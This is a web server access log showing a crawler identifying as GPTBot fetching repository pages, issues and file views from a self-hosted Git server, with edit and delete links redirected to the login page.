"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11416] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11412] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13197] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10130] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 14219] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:18:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 11622] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:18:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" -[17/Feb/2026:18:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp?display=source" [Client 74.7.227.38] [Length 18880] [Gzip 6.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" -[17/Feb/2026:18:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11891] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:18:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 12241] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:18:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:18:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:18:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11136] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10298] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" -[17/Feb/2026:18:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild" [Client 74.7.227.38] [Length 30637] [Gzip 7.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build" -[17/Feb/2026:18:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fdist" [Client 74.7.227.38] [Length 17067] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist" -[17/Feb/2026:18:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11992] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 973] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:12:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:12:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11350] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10541] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:12:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 10179] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:12:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:12:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9862] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 10168] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:18:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1541] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:12:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" -[17/Feb/2026:18:12:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 